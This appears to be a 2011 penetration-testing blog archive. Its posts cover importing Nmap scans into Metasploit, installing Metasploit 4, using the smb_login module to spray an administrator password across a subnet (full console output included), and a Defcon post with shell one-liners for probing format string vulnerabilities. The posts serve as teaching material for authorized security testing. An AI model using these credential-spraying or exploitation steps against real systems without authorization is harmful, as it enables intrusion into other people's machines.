» Metasploit

Importing and Working with Nmap Scans in Metasploit Framework 4

Posted on September 14, 2011 by Mark Marshall in Main | Leave a comment

Importing Nmap scans directly into Metasploit is one of the best time-saving tricks you can accomplish while using the Metasploit Framework. Once the full Nmap data is happily in your PostgreSQL database and accessible to Metasploit you can do all kinds of cool things with it that will save you lots of time and frustration on a large penetration test.
For this example I’m assuming you’ve got a fully functional PostgreSQL database already configured and accessible to Metasploit. This is normally the case if you’ve performed a full install of Metasploit 4. I’ll cover the basics of setting up and connecting to a PostgreSQL database in a future post.
Run db_status to determine if your database is set up properly and accessible to Metasploit. If you see the following output you are set:

msf > db_status
[*] postgresql connected to msf_database

To start, you need Nmap output saved to a file. Do this by feeding Nmap the -oA flag when you scan which will save the results in all 3 major file formats: XML, Nmap and Grepable.
From within msfconsole import your scan data:

msf > db_import 192.168_scan.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.4.3.1'
[*] Importing host 192.168.1.1
[*] Importing host 192.168.1.2
[*] Importing host 192.168.1.3
[*] Importing host 192.168.1.4
[*] Importing host 192.168.1.7
[*] Importing host 192.168.1.9
[*] Importing host 192.168.1.10
[*] Importing host 192.168.1.13
[*] Importing host 192.168.1.15
[*] Importing host 192.168.1.16
[*] Importing host 192.168.1.22
[*] Importing host 192.168.1.100
[*] Successfully imported /home/mark/192.168_scan.xml

Once this completes successfully your Nmap data will be contained in the Postgresql database and fully accessible to Metasploit. This opens up all kinds of flexibility that will really save your bacon on large scans.
If you want to you can also perform Nmap scans directly from within the Metasploit Framework and have it automatically added to the database. To do this use the db_nmap command followed by the flags you wish to use and the hosts or subnets you want to scan. I typically like to do Nmap scanning outside of Metasploit in order to have more flexibility about the types of scans I perform and I may run many different scans and cat them together or otherwise manipulate them prior to feeding them into Metasploit. Obviously, do what makes sense for your situation.
Type ‘hosts’ to get a list of all hosts in the database. Use ‘hosts -u’ to get a list of only hosts that respond to ping and are believed to be up.

msf > hosts -u
Hosts
=====
address        mac  name             os_name  os_flavor  os_sp  purpose  info  comments
-------        ---  ----             -------  ---------  -----  -------  ----  --------
192.168.1.1                          Unknown                    device
192.168.1.10        goro.home        Unknown                    device

You can also query based on services. Execute ‘services’ with no parameters to dump all hosts and all services in the database. This isn’t particularly useful and can be quite huge depending on the scan data that you’re working with. Thankfully you can parse this further before it’s output to the console. Use the -p flag to only list specific ports you’re interested in.

msf > services -p 445 -u 
Services
========
host           port  proto  name          state  info
----           ----  -----  ----          -----  ----
192.168.1.10   445   tcp    microsoft-ds  open   Samba smbd 3.X workgroup: SKYNET
192.168.1.100  445   tcp    microsoft-ds  open
192.168.1.11   445   tcp    netbios-ssn   open
192.168.1.2    445   tcp    microsoft-ds  open
192.168.1.22   445   tcp    microsoft-ds  open
192.168.1.4    445   tcp    microsoft-ds  open   Microsoft Windows 2003 or 2008 microsoft-ds
192.168.1.6    445   tcp    netbios-ssn   open
192.168.1.9    445   tcp    microsoft-ds  open

Here i’m listing only hosts that have 445/tcp open. I’ve also added the -u flag to only show services that are open.
If you’re a narcissist, at this point you’re probably thinking “big whoop, I can do all this via a few grep strings on the Nmap output”. And you’re correct.
Now to do something useful with this.

msf > services -p 445 -R

Services
========

host           port  proto  name          state  info
----           ----  -----  ----          -----  ----
192.168.1.10   445   tcp    microsoft-ds  open   Samba smbd 3.X workgroup: SKYNET
192.168.1.100  445   tcp    microsoft-ds  open
192.168.1.11   445   tcp    netbios-ssn   open
192.168.1.2    445   tcp    microsoft-ds  open
192.168.1.22   445   tcp    microsoft-ds  open
192.168.1.4    445   tcp    microsoft-ds  open   Microsoft Windows 2003 or 2008 microsoft-ds
192.168.1.6    445   tcp    netbios-ssn   open
192.168.1.9    445   tcp    microsoft-ds  open

RHOSTS => file:/tmp/msf-db-rhosts-20110909-32464-oyzbko

Looks the same as before, but by adding the -R flag, you’ve told Metasploit to set the RHOSTS variable to the output of the database query you’ve just performed. This is reflected in the last line of output which is the filename of the hosts that you’ve selected from the database which Metasploit created and populated.
Now select an exploit to use against these hosts

msf > use auxiliary/scanner/smb/smb_enumusers
msf  auxiliary(smb_enumusers) > show options

Module options (auxiliary/scanner/smb/smb_enumusers):

   Name       Current Setting                                Required  Description
   ----       ---------------                                --------  -----------
   RHOSTS     file:/tmp/msf-db-rhosts-20110909-32464-oyzbko  yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP                                      no        The Windows domain to use for authentication
   SMBPass                                                   no        The password for the specified username
   SMBUser                                                   no        The username to authenticate as
   THREADS    1                                              yes       The number of concurrent threads

As you can see Metapsloit has filled in the RHOSTS variable automatically for this exploit. You don’t need to have a pre-selected exploit in order for Metasploit to do this, and can choose an exploit after you’ve piped the output of a database query to the input of the RHOSTS variable.
Using Metasploit Framework 4 tied to a database is a great way to save time and effort while working with large projects and scans of several hundred to several thousand hosts and many more services.

Installing Metasploit 4 in Ubuntu 11.04

Posted on August 19, 2011 by Mark Marshall in Main | 3 Comments

Install the latest version of the Metasploit 4 Framework (MSF4) on Ubuntu 11.04 Natty Narwhal using the following commands. This downloads and installs the generic Linux binary which comes bundled with all the necessary components you need for Metasploit to install and run. This should work for most users and is the easiest way to get Metasploit Framework running under Ubuntu and other Debian based Linux distros quickly.

In a Terminal type the following

 wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run

If you’re installing on a 64bit build of Ubuntu, use this instead

wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-x64-full.run

This downloads the current version of the Metasploit framework via wget.
Before you can run the installer you need to make it executable.

chmod +x framework-4.*-linux-full.run

And now execute the installer.

sudo ./framework-4.*-linux-full.run

Assuming all went well MSF 4 should now be installed. You should update it before running it.

sudo msfupdate

Now run it.

msfconsole

You should now be rewarded by one of the awesome ascii art logos and a functional Metasploit install.

If this fails for any reason you’ll want to do a manual install instead, which is a bit more complicated but if followed correctly should get you up and running. Find the official directions at Rapid7

Testing Windows Passwords with Metasploit

Posted on August 17, 2011 by Mark Marshall in Main | 2 Comments

An attacker will take the path of least resistance in order to gain access to critical systems and data. During a penetration test we’ll take the same tactic as well.

Frequently this is accomplished by guessing a password to a users account and then either using the privileges of that account to gain access to critical data or escalating that account to an administrator or root level account. Once credentials have been acquired for one host you’ll want to determine what other systems they work against. It is fairly common to gain access to a local administrator account on a workstation or server for example, but not a domain account and in this case you will want to try that local administrator account against a whole slew of other systems.

There are a number of ways to accomplish this task but one of the most efficient ways is using the smb_login module of Metasploit Framework 4 to test a single username/password combination against a lot of boxes very quickly.

msf > use auxiliary/scanner/smb/smb_login
msf  auxiliary(smb_login) > set smbpass Password!
smbpass => Password!
msf  auxiliary(smb_login) > set smbuser administrator
smbuser => administrator
msf  auxiliary(smb_login) > set user_as_pass false
user_as_pass => false
msf  auxiliary(smb_login) > set rhosts 10.0.0.100-110
rhosts => 10.0.0.100-110
msf  auxiliary(smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASS_FILE                          no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RHOSTS            10.0.0.100-110   yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain         WORKGROUP        no        SMB Domain
   SMBPass           Password!        no        SMB Password
   SMBUser           administrator    no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
msf  auxiliary(smb_login) > exploit

[*] 10.0.0.100:445 SMB - Starting SMB login bruteforce
[*] 10.0.0.101:445 SMB - Starting SMB login bruteforce
[*] Scanned 02 of 11 hosts (018% complete)
[*] 10.0.0.102:445 SMB - Starting SMB login bruteforce
[*] Scanned 03 of 11 hosts (027% complete)
[*] 10.0.0.103:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 04 of 11 hosts (036% complete)
[*] 10.0.0.104:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 05 of 11 hosts (045% complete)
[*] 10.0.0.105:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 06 of 11 hosts (054% complete)
[*] 10.0.0.106:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 07 of 11 hosts (063% complete)
[*] 10.0.0.107:445 SMB - [1/2] - Starting SMB login bruteforce
[*] 10.0.0.107:445 SMB - [1/2] - |WORKGROUP - FAILED LOGIN (Windows 5.1) administrator :  (STATUS_LOGON_FAILURE)
[+] 10.0.0.107:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 5.1) 'administrator' : 'Password!'
[*] Scanned 08 of 11 hosts (072% complete)
[*] 10.0.0.108:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 09 of 11 hosts (081% complete)
[*] 10.0.0.109:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 10 of 11 hosts (090% complete)
[*] 10.0.0.110:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(smb_login) >

In this example I successfully compromised one of my test systems that was using the password ‘Password!’ for the local administrator account. This may seem far fetched, but I’ve seen worse than this before on engagements.

Be aware that this type of activity is very noisy and easily detectable by a sysadmin or security goon, as it will create a failed login attempt for the Administrator account on every machine in the subnet.

Metasploit 4.0 Highlights

Posted on July 29, 2011 by Mark Marshall in Main | Leave a comment

Earlier this week HD Moore gave a live webcast demoing the new highly anticipated Metasploit 4 release. The live demo went as smoothly as a live demo can go, and as always HD Moore is great to hear talk no matter what the topic is. This presentation was particularly excellent because he’s so passionate about the Metasploit project – which he single-handedly created nearly 10 years ago, and has since watched grow into the de-facto tool used by penetration testers and infosec warriors.

Some statistics about Metasploit over the years:

  • 2003 – Metasploit 1.0 – 11 exploits
  • 2004 – Metasploit 2.0 – 18 exploits
  • 2007 – Metasploit 3.0 – 177 exploits
  • 2011 – Metasploit 4.0 – 716 exploits

1 million unique downloads in the past 12 months
Rapid 7 sponsorship of Metasploit has doubled the line count of the codebase

HD’s excitement over new features that he and his team have been working on
for nearly a year was quite obvious, and he said that they’ve barely
slept in the last 3 months as the release date looms ever closer and
crunch time arrives.

Going through every new feature is beyond the scope of this quick blog post, so here’s the highlights as shown in the slides.

 

 

 

 

 

 

 

I’ll touch on a couple of new features and why they’re interesting. A number of new features are exclusive to Metasploit Pro, but a lot of the core stuff is available in every version of Metasploit, including the Metasploit Framework which is free and open source.

  • Optimization for large scale penetration tests. Previously Metasploit really didn’t scale beyond a thousand hosts.  Now it’s possible to load full vulnerability scans of upwards of 10,000 hosts without any issue.
  • Standardized XML API. The entire XML API is documented and will be released under an open source license.
  • Persistent agents and listeners. This is sweet. Now if you lose connection with a box you’ve compromised all isn’t lost. You can setup the payload to persistently attempt reconnects back to your listener. If the network goes down temporarily or a WiFi connection drops, all isn’t lost now. You can configure every aspect of it too, set an expiration date after which it’ll remove itself and other fun stuff.
  • Full integration with John the Ripper. Rapid7 now sponsors the JtR project, and has fully integrated it into MSF. As sad as it is, most compromises happen via a trivially guessed password on a critical box.  MSF now has many, many options for mutating wordlists as well as seeding password lists with data discovered during scanning.
  • Full remote control of MSF via a brand new RPC interface written in Ruby (msfrpc-client).
  • Support for imports from over a dozen other scanners , including Appscan, Netsparker and many more.
  • Shiny graphs and pretty pictures to look at. Don’t really care about this, but it’s great for higher level suits and execs. MSF can now spit out a pretty report with all kinds of details and graphs after the pentest is complete.

And obligatory screenshot of the brand new interface

 

 

 

 

 

 

 

Metasploit 4 looks like a great release and continues Rapid 7′s charge into the enterprise market, but without totally alienating the core users who’ve been using MSF for years.

Defcon: Advanced Format String Attacks

Posted on August 9, 2010 by The Shell Shakespear Leave a comment

Congratulations to those that survived the giant hangover that was Defcon 18, my presentation on Advanced Format String Attacks and especially the post Q&A and Mario Kart. My presentation was a continuation of my previous Automatic Format String Exploitation research, and I have updated the materials from the presentation here: defcon-18-paul_haas-advanced_format_string_attacks_final.pdf. I have also uploaded the demos from my talk, sans voice:

Demo 1: Attacking a program vulnerable (Makefile) to a format string attack, we dump the stack of the program until we find our passed format string using the following code:
for i in {001..200}; do echo -n "offset $i (%$i\$08x) = "; ./printf "%$i\$08x" | python -c "import sys, struct; s=int(sys.stdin.read(),16); print '0x%08x: %s' % (s,repr(struct.pack('L',s)))"; done

Demo 2: Finding the address of our format string. This combined with the stack offset found in the previous step lets us associate any data on the stack with its address using the following code:
or i in {1..100}; do ./printf "offset $i = %$i\$p:%$i\$s"; echo; done | grep -v ^$

Demo 3: Video of our technique demonstrated in our previous POC tool automatically exploiting a program vulnerable to a format string attack by locating the stack offset and address of our exploit and overwriting a known return location.

Demo 4: Automatically exploiting a program vulnerable to a format string attack by locating the stack offset and address of our exploit and brute forcing address on the stack for a valid return location. This includes both a Python and Ruby implementation.

Demo 5: Metasploit demonstration of a remote server vulnerable to a format string attack exploited automatically by locating the stack offset and address of our exploit and brute forcing address on the stack for a valid return location. The Metasploit module and vulnerable server are available for download.

All of the above plus additional documentation can be downloaded in a single archive here: DEFCON-18-Haas-Adv-Format-String-Attacks.tar.bz2